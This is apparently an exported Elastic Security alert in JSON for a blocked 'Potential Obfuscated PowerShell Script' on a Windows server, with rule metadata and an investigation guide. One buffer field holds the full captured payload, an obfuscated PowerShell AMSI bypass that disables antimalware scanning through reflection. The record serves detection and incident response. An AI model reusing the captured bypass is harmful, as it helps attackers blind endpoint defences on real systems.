Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected.", | |
| "kibana.alert.rule.references": [], | |
| "kibana.alert.rule.risk_score_mapping": [ | |
| { | |
| "field": "event.risk_score", | |
| "operator": "equals", | |
| "value": "" | |
| } | |
| ], | |
| "kibana.alert.rule.rule_id": "9a1a2dae-0b5f-4c3d-8305-a268d404c306", | |
| "kibana.alert.rule.rule_name_override": "message", | |
| "kibana.alert.rule.severity_mapping": [ | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "low", | |
| "value": "21" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "medium", | |
| "value": "47" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "high", | |
| "value": "73" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "critical", | |
| "value": "99" | |
| } | |
| ], | |
| "kibana.alert.rule.threat": [], | |
| "kibana.alert.rule.timestamp_override": "event.ingested", | |
| "kibana.alert.rule.to": "now", | |
| "kibana.alert.rule.type": "query", | |
| "kibana.alert.rule.updated_at": "2025-08-25T09:37:22.832Z", | |
| "kibana.alert.rule.updated_by": "586246785", | |
| "kibana.alert.rule.version": 108, | |
| "kibana.alert.url": "https://samir.kb.us-central1.gcp.cloud.es.io/app/security/alerts/redirect/f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659?index=.alerts-security.alerts-default×tamp=2025-10-14T15:22:17.361Z", | |
| "kibana.alert.uuid": "f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659", | |
| "kibana.alert.workflow_tags": [], | |
| "kibana.alert.workflow_assignee_ids": [], | |
| "kibana.alert.rule.risk_score": 47, | |
| "kibana.alert.rule.severity": "medium", | |
| "kibana.alert.intended_timestamp": "2025-10-14T15:22:17.361Z", | |
| "kibana.alert.rule.execution.type": "scheduled" | |
| }, | |
| "fields": { | |
| "host.os.full.text": [ | |
| "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.rule.updated_by": [ | |
| "586246785" | |
| ], | |
| "host.os.name.text": [ | |
| "Windows" | |
| ], | |
| "kibana.alert.rule.rule_name_override": [ | |
| "message" | |
| ], | |
| "process.hash.sha256": [ | |
| "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c" | |
| ], | |
| "host.hostname": [ | |
| "win-svr-2019-st" | |
| ], | |
| "signal.original_event.created": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "host.mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "elastic.agent.id": [ | |
| "6570a119-1004-44eb-b3eb-5324657de79e" | |
| ], | |
| "Events.event.outcome": [ | |
| "unknown" | |
| ], | |
| "signal.rule.enabled": [ | |
| "true" | |
| ], | |
| "host.os.version": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "signal.rule.max_signals": [ | |
| 1000 | |
| ], | |
| "kibana.alert.risk_score": [ | |
| 73 | |
| ], | |
| "signal.rule.updated_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "Endpoint.policy.applied.id": [ | |
| "27c05512-d3ed-4826-9f1d-d8876a66d61a" | |
| ], | |
| "kibana.alert.original_event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g348" | |
| ], | |
| "event.severity": [ | |
| 73 | |
| ], | |
| "Responses.action.action": [ | |
| "kill_process" | |
| ], | |
| "host.os.type": [ | |
| "windows" | |
| ], | |
| "signal.original_event.code": [ | |
| "behavior" | |
| ], | |
| "kibana.alert.original_event.module": [ | |
| "endpoint" | |
| ], | |
| "kibana.alert.rule.interval": [ | |
| "1m" | |
| ], | |
| "kibana.alert.rule.type": [ | |
| "query" | |
| ], | |
| "kibana.alert.rule.immutable": [ | |
| "true" | |
| ], | |
| "kibana.alert.rule.exceptions_list.list_id": [ | |
| "endpoint_list" | |
| ], | |
| "threat.technique.subtechnique.name": [ | |
| "PowerShell" | |
| ], | |
| "process.Ext.api.parameters.buffer": [ | |
| "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.manifest_type": [ | |
| "stable" | |
| ], | |
| "kibana.alert.rule.version": [ | |
| "108" | |
| ], | |
| "Events.process.code_signature.trusted": [ | |
| true | |
| ], | |
| "process.command_line.text": [ | |
| "powershell" | |
| ], | |
| "Events.process.parent.executable": [ | |
| "C:\\Windows\\System32\\cmd.exe" | |
| ], | |
| "Events.host.mac": [ | |
| "00-50-56-11-7d-d9", | |
| "0a-00-27-00-00-04" | |
| ], | |
| "signal.original_event.outcome": [ | |
| "success" | |
| ], | |
| "threat.framework": [ | |
| "MITRE ATT&CK" | |
| ], | |
| "process.Ext.api.parameters.app_name": [ | |
| "PowerShell" | |
| ], | |
| "process.entity_id": [ | |
| "Fr+lArd4jbWUm9nDJqjXuw" | |
| ], | |
| "host.ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "agent.type": [ | |
| "endpoint" | |
| ], | |
| "process.pe.original_file_name": [ | |
| "PowerShell.EXE" | |
| ], | |
| "process.executable.text": [ | |
| "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| ], | |
| "signal.original_event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "Events.user.id": [ | |
| "S-1-5-21-2202811333-351044183-798744757-500" | |
| ], | |
| "Events.process.command_line": [ | |
| "powershell" | |
| ], | |
| "Endpoint.policy.applied.name": [ | |
| "myDefend" | |
| ], | |
| "host.id": [ | |
| "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf" | |
| ], | |
| "process.Ext.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "Responses.@timestamp": [ | |
| "2025-10-14T15:21:30.5966574Z" | |
| ], | |
| "Events.@timestamp": [ | |
| "2025-10-14T15:21:30.2270851Z" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.channel": [ | |
| "default" | |
| ], | |
| "Events.user.name": [ | |
| "Administrator" | |
| ], | |
| "kibana.alert.rule.indices": [ | |
| "logs-endpoint.alerts-*" | |
| ], | |
| "host.os.Ext.variant": [ | |
| "Windows Server 2019 Standard" | |
| ], | |
| "signal.rule.updated_by": [ | |
| "586246785" | |
| ], | |
| "host.os.platform": [ | |
| "windows" | |
| ], | |
| "kibana.alert.intended_timestamp": [ | |
| "2025-10-14T15:22:17.361Z" | |
| ], | |
| "kibana.alert.rule.severity": [ | |
| "medium" | |
| ], | |
| "Endpoint.policy.applied.artifacts.user.identifiers.sha256": [ | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658", | |
| "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658" | |
| ], | |
| "kibana.alert.rule.execution.timestamp": [ | |
| "2025-10-14T15:22:17.403Z" | |
| ], | |
| "Events.process.Ext.token.integrity_level_name": [ | |
| "high" | |
| ], | |
| "kibana.version": [ | |
| "9.1.2" | |
| ], | |
| "event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g348" | |
| ], | |
| "signal.ancestors.type": [ | |
| "event" | |
| ], | |
| "user.name.text": [ | |
| "Administrator" | |
| ], | |
| "Events.event.provider": [ | |
| "Microsoft-Antimalware-Scan-Interface" | |
| ], | |
| "kibana.alert.ancestors.id": [ | |
| "AZnjUAfs4fyCfCR7INh3" | |
| ], | |
| "process.name.text": [ | |
| "powershell.exe" | |
| ], | |
| "host.os.full": [ | |
| "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.original_data_stream.namespace": [ | |
| "default" | |
| ], | |
| "kibana.alert.original_event.code": [ | |
| "behavior" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.identifiers.name": [ | |
| "diagnostic-configuration-v1", | |
| "diagnostic-endpointpe-v4-blocklist", | |
| "diagnostic-endpointpe-v4-exceptionlist", | |
| "diagnostic-endpointpe-v4-model", | |
| "diagnostic-malware-signature-v1-windows", | |
| "diagnostic-ransomware-v1-windows", | |
| "diagnostic-rules-windows-v1", | |
| "endpointpe-v4-blocklist", | |
| "endpointpe-v4-exceptionlist", | |
| "endpointpe-v4-model", | |
| "global-configuration-v1", | |
| "global-eventfilterlist-windows-v1", | |
| "global-exceptionlist-windows", | |
| "global-trustlist-windows-v1", | |
| "production-malware-signature-v1-windows", | |
| "production-ransomware-v1-windows", | |
| "production-rules-windows-v1", | |
| "tamper-protection-config-v1" | |
| ], | |
| "kibana.alert.rule.description": [ | |
| "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts." | |
| ], | |
| "process.Ext.api.summary": [ | |
| "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )" | |
| ], | |
| "kibana.alert.rule.producer": [ | |
| "siem" | |
| ], | |
| "kibana.alert.rule.to": [ | |
| "now" | |
| ], | |
| "Endpoint.policy.applied.artifacts.user.version": [ | |
| "1.0.0" | |
| ], | |
| "kibana.alert.original_event.ingested": [ | |
| "2025-10-14T15:22:06.000Z" | |
| ], | |
| "signal.rule.id": [ | |
| "0a1f09ab-3c54-44a0-b434-b6af4e252a3f" | |
| ], | |
| "rule.ruleset": [ | |
| "production" | |
| ], | |
| "signal.reason": [ | |
| "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script." | |
| ], | |
| "signal.rule.risk_score": [ | |
| 73 | |
| ], | |
| "host.os.name": [ | |
| "Windows" | |
| ], | |
| "Responses.action.field": [ | |
| "process.entity_id" | |
| ], | |
| "process.Ext.api.metadata.return_value": [ | |
| 1 | |
| ], | |
| "signal.status": [ | |
| "open" | |
| ], | |
| "Events.host.os.full": [ | |
| "Windows Server 2019 Standard 1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.rule.severity_mapping.value": [ | |
| "21", | |
| "47", | |
| "73", | |
| "99" | |
| ], | |
| "signal.rule.tags": [ | |
| "Data Source: Elastic Defend", | |
| "Resources: Investigation Guide" | |
| ], | |
| "rule.name": [ | |
| "Potential Obfuscated PowerShell Script" | |
| ], | |
| "kibana.alert.rule.uuid": [ | |
| "0a1f09ab-3c54-44a0-b434-b6af4e252a3f" | |
| ], | |
| "Events.process.executable": [ | |
| "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| ], | |
| "kibana.alert.original_event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "signal.original_event.risk_score": [ | |
| 73 | |
| ], | |
| "Events.host.os.name": [ | |
| "Windows" | |
| ], | |
| "Responses.process.entity_id": [ | |
| "Fr+lArd4jbWUm9nDJqjXuw" | |
| ], | |
| "rule.description": [ | |
| "Identifies the execution of PowerShell with potentially obfuscated content. This behavior is often observed during malware installation leveraging PowerShell." | |
| ], | |
| "threat.technique.id": [ | |
| "T1059" | |
| ], | |
| "Events.process.Ext.api.name": [ | |
| "AmsiScanBuffer" | |
| ], | |
| "Events.process.name": [ | |
| "powershell.exe" | |
| ], | |
| "process.name": [ | |
| "powershell.exe" | |
| ], | |
| "Events.process.Ext.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "process.parent.executable.text": [ | |
| "C:\\Windows\\System32\\cmd.exe" | |
| ], | |
| "Events.process.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "kibana.alert.ancestors.index": [ | |
| ".ds-logs-endpoint.alerts-default-2025.09.24-000002" | |
| ], | |
| "process.Ext.code_signature.trusted": [ | |
| true | |
| ], | |
| "Events.process.Ext.api.summary": [ | |
| "AmsiScanBuffer( PowerShell, NULL, 69238e486d9598d02da6f03bbb7abd998911e42c5936619f4c00e4ff0cd598c9 )" | |
| ], | |
| "agent.version": [ | |
| "9.1.2" | |
| ], | |
| "signal.original_event.severity": [ | |
| 73 | |
| ], | |
| "kibana.alert.rule.risk_score_mapping.operator": [ | |
| "equals" | |
| ], | |
| "host.os.family": [ | |
| "windows" | |
| ], | |
| "kibana.alert.rule.from": [ | |
| "now-2m" | |
| ], | |
| "kibana.alert.rule.parameters": [ | |
| { | |
| "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by whitelisting these applications based on their hash or path.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected.", | |
| "severity_mapping": [ | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "low", | |
| "value": "21" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "medium", | |
| "value": "47" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "high", | |
| "value": "73" | |
| }, | |
| { | |
| "field": "event.severity", | |
| "operator": "equals", | |
| "severity": "critical", | |
| "value": "99" | |
| } | |
| ], | |
| "description": "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts.", | |
| "language": "kuery", | |
| "type": "query", | |
| "rule_name_override": "message", | |
| "exceptions_list": { | |
| "id": "endpoint_list", | |
| "list_id": "endpoint_list", | |
| "type": "endpoint", | |
| "namespace_type": "agnostic" | |
| }, | |
| "timestamp_override": "event.ingested", | |
| "from": "now-2m", | |
| "severity": "medium", | |
| "max_signals": 1000, | |
| "rule_source": { | |
| "type": "external", | |
| "is_customized": false | |
| }, | |
| "risk_score": 47, | |
| "risk_score_mapping": { | |
| "field": "event.risk_score", | |
| "operator": "equals", | |
| "value": "" | |
| }, | |
| "author": "Elastic", | |
| "query": "event.kind:alert and event.module:(endpoint and not endgame)\n", | |
| "index": "logs-endpoint.alerts-*", | |
| "version": 108, | |
| "rule_id": "9a1a2dae-0b5f-4c3d-8305-a268d404c306", | |
| "license": "Elastic License v2", | |
| "required_fields": [ | |
| { | |
| "name": "event.kind", | |
| "type": "keyword", | |
| "ecs": true | |
| }, | |
| { | |
| "name": "event.module", | |
| "type": "keyword", | |
| "ecs": true | |
| } | |
| ], | |
| "immutable": true, | |
| "related_integrations": { | |
| "package": "endpoint", | |
| "version": "^9.0.0" | |
| }, | |
| "setup": "## Setup\n\n### Elastic Defend Alerts\nIf this rule is disabled, you will not receive alerts for Elastic Defend alerts. This rule is designed to capture all alerts generated by Elastic Defend. For more granular alerting, consider using additional prebuilt-rules that capture specific Elastic Defend alerts.\n\nIf this rule is enabled, along with the related rules listed below, you will receive duplicate alerts for the same events. To avoid this, it is recommended to disable this generic rule and enable the more specific rules that capture these alerts separately.\n\nRelated rules:\n- Behavior - Detected - Elastic Defend (UUID: 0f615fe4-eaa2-11ee-ae33-f661ea17fbce)\n- Behavior - Prevented - Elastic Defend (UUID: eb804972-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Detected - Elastic Defend (UUID: f2c3caa6-ea34-11ee-a417-f661ea17fbce)\n- Malicious File - Prevented - Elastic Defend (UUID: f87e6122-ea34-11ee-a417-f661ea17fbce)\n- Memory Threat - Detected - Elastic Defend (UUID: 017de1e4-ea35-11ee-a417-f661ea17fbce)\n- Memory Threat - Prevented - Elastic Defend (UUID: 06f3a26c-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Detected - Elastic Defend (UUID: 0c74cd7e-ea35-11ee-a417-f661ea17fbce)\n- Ransomware - Prevented - Elastic Defend (UUID: 10f3d520-ea35-11ee-a417-f661ea17fbce)\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", | |
| "to": "now" | |
| } | |
| ], | |
| "signal.original_event.kind": [ | |
| "alert" | |
| ], | |
| "threat.technique.name": [ | |
| "Command and Scripting Interpreter" | |
| ], | |
| "Responses.message": [ | |
| "Success" | |
| ], | |
| "Events.event.type": [ | |
| "allowed" | |
| ], | |
| "Events.event.created": [ | |
| "2025-10-14T15:21:30.5741785Z" | |
| ], | |
| "signal.depth": [ | |
| 1 | |
| ], | |
| "signal.rule.immutable": [ | |
| "true" | |
| ], | |
| "process.Ext.api.name": [ | |
| "AmsiScanBuffer" | |
| ], | |
| "event.sequence": [ | |
| 106319 | |
| ], | |
| "signal.rule.name": [ | |
| "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script" | |
| ], | |
| "event.module": [ | |
| "endpoint" | |
| ], | |
| "kibana.alert.rule.severity_mapping.operator": [ | |
| "equals", | |
| "equals", | |
| "equals", | |
| "equals" | |
| ], | |
| "host.os.kernel": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "kibana.alert.rule.license": [ | |
| "Elastic License v2" | |
| ], | |
| "kibana.alert.original_event.kind": [ | |
| "alert" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.update_age": [ | |
| 0 | |
| ], | |
| "signal.rule.description": [ | |
| "Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts." | |
| ], | |
| "process.args": [ | |
| "powershell" | |
| ], | |
| "message": [ | |
| "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script" | |
| ], | |
| "Responses.process.name": [ | |
| "powershell.exe" | |
| ], | |
| "rule.version": [ | |
| "1.0.4" | |
| ], | |
| "kibana.alert.original_event.outcome": [ | |
| "success" | |
| ], | |
| "kibana.alert.original_event.sequence": [ | |
| 106319 | |
| ], | |
| "kibana.alert.original_data_stream.type": [ | |
| "logs" | |
| ], | |
| "threat.technique.subtechnique.id": [ | |
| "T1059.001" | |
| ], | |
| "kibana.alert.rule.exceptions_list.namespace_type": [ | |
| "agnostic" | |
| ], | |
| "threat.technique.reference": [ | |
| "https://attack.mitre.org/techniques/T1059/" | |
| ], | |
| "kibana.space_ids": [ | |
| "default" | |
| ], | |
| "kibana.alert.severity": [ | |
| "high" | |
| ], | |
| "rule.id": [ | |
| "f4db84b1-13d8-432d-999a-54a09784e62b" | |
| ], | |
| "Responses.result": [ | |
| 0 | |
| ], | |
| "signal.ancestors.depth": [ | |
| 0 | |
| ], | |
| "event.category": [ | |
| "malware", | |
| "intrusion_detection" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.identifiers.sha256": [ | |
| "44341700c27a82d3b4a8471cfe8a57447fc6ddbac8f1e855707dd3767e9491e2", | |
| "338eb3e0d0c2b7efcd291ca270a0a6188d3632a25c7a8dc5d020fdb44293e12f", | |
| "9399bb8a3210f3ffea4e028eb3d087455bab6678df8b56ad77f276ee376533ef", | |
| "eae3c9a96708f28da4346ee245b8d673642ee9295e0f0aa4192889d4ade3616a", | |
| "fd827c57f7b99723b3f6f7dbf0c2644ac5147f4ebbe320edc6ccd4b7ce68001c", | |
| "9636fb1bda16d4dc236d40d2aeb379f30d81276028e9b3048002e3ca6a83dfb5", | |
| "81af5fca19bd11e5f167685e1b638ad360d08c39af8264144464e6991019ad28", | |
| "1c0de0df678f1e42eed7635722be3e82fd6731585bc2618086d126ec9b70121b", | |
| "6aa317caa75a727cb988c45e8af7d5c0fc5e722a6322aad190bc3c8bf56c2e3d", | |
| "cf2335c28acaee3072ffd893f229242be71ba75043ae96576227f9fea651c497", | |
| "85501044f22938c806155e33a171abbce9eb4c1544d45d45c6c049c7cb1395d7", | |
| "3a6bf42f273a2e663d9ad273b445cca21d9da8bb336f6f62b262dc55598e1005", | |
| "f50a756ecf8fd5c4fbe40efbec2bac52f9deb1dab44850f107b4b27663406573", | |
| "aaeab218a20828574c347e88ecb4eb411ffca9e8496c484327b2213f49e1dc9e", | |
| "1fa3b2936f9cc7adcef6d0af6803f32cb1e965b1297056620396ce31605151ac", | |
| "e3efc40c7e3fc0a590a074011abf990ab120f9f182b3dbca7b32ee58d0e5c3aa", | |
| "608fb0db8fa37493c5cdcbb4e319ff911937bb8b021efc3efb7d58d1cf88d3bf", | |
| "07f2a166efe84d3b52b6cd8b841f33ffe6eb8e2297cefd4eaa3e50e567b4d30e" | |
| ], | |
| "Events.host.ip": [ | |
| "10.0.0.19", | |
| "fe80::382c:f652:1d40:ee4e", | |
| "192.168.56.1", | |
| "fe80::5d9e:2b92:1905:13a8", | |
| "127.0.0.1", | |
| "::1" | |
| ], | |
| "kibana.alert.original_event.risk_score": [ | |
| 73 | |
| ], | |
| "kibana.alert.rule.tags": [ | |
| "Data Source: Elastic Defend", | |
| "Resources: Investigation Guide" | |
| ], | |
| "process.code_signature.exists": [ | |
| true | |
| ], | |
| "kibana.alert.reason.text": [ | |
| "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script." | |
| ], | |
| "Events.process.Ext.code_signature.trusted": [ | |
| true | |
| ], | |
| "kibana.alert.ancestors.depth": [ | |
| 0 | |
| ], | |
| "threat.technique.name.text": [ | |
| "Command and Scripting Interpreter" | |
| ], | |
| "Events.host.id": [ | |
| "cb7eef6d-979b-434c-b48f-5a91a9c6cfcf" | |
| ], | |
| "kibana.alert.rule.severity_mapping.severity": [ | |
| "low", | |
| "medium", | |
| "high", | |
| "critical" | |
| ], | |
| "agent.build.original": [ | |
| "version: 9.1.2, compiled: Thu Aug 7 15:00:00 2025, branch: HEAD, commit: 26c15136855b7ac73fdaa74b77e6492f254420c5" | |
| ], | |
| "event.agent_id_status": [ | |
| "verified" | |
| ], | |
| "Events.process.Ext.api.parameters.app_name": [ | |
| "PowerShell" | |
| ], | |
| "Events.process.Ext.api.metadata.return_value": [ | |
| 1 | |
| ], | |
| "event.outcome": [ | |
| "success" | |
| ], | |
| "Events.event.kind": [ | |
| "event" | |
| ], | |
| "kibana.alert.rule.risk_score_mapping.value": [ | |
| "" | |
| ], | |
| "process.Ext.api.parameters.size": [ | |
| 3822 | |
| ], | |
| "user.id": [ | |
| "S-1-5-21-2202811333-351044183-798744757-500" | |
| ], | |
| "signal.original_event.sequence": [ | |
| 106319 | |
| ], | |
| "event.risk_score": [ | |
| 73 | |
| ], | |
| "Events.host.hostname": [ | |
| "win-svr-2019-st" | |
| ], | |
| "threat.technique.subtechnique.reference": [ | |
| "https://attack.mitre.org/techniques/T1059/001/" | |
| ], | |
| "host.architecture": [ | |
| "x86_64" | |
| ], | |
| "kibana.alert.start": [ | |
| "2025-10-14T15:22:17.403Z" | |
| ], | |
| "process.Ext.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "event.code": [ | |
| "behavior" | |
| ], | |
| "kibana.alert.original_event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "agent.id": [ | |
| "6570a119-1004-44eb-b3eb-5324657de79e" | |
| ], | |
| "signal.original_event.module": [ | |
| "endpoint" | |
| ], | |
| "signal.rule.from": [ | |
| "now-2m" | |
| ], | |
| "kibana.alert.rule.exceptions_list.type": [ | |
| "endpoint" | |
| ], | |
| "kibana.alert.rule.enabled": [ | |
| "true" | |
| ], | |
| "kibana.alert.ancestors.type": [ | |
| "event" | |
| ], | |
| "Events.host.os.type": [ | |
| "windows" | |
| ], | |
| "Events.process.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "signal.ancestors.index": [ | |
| ".ds-logs-endpoint.alerts-default-2025.09.24-000002" | |
| ], | |
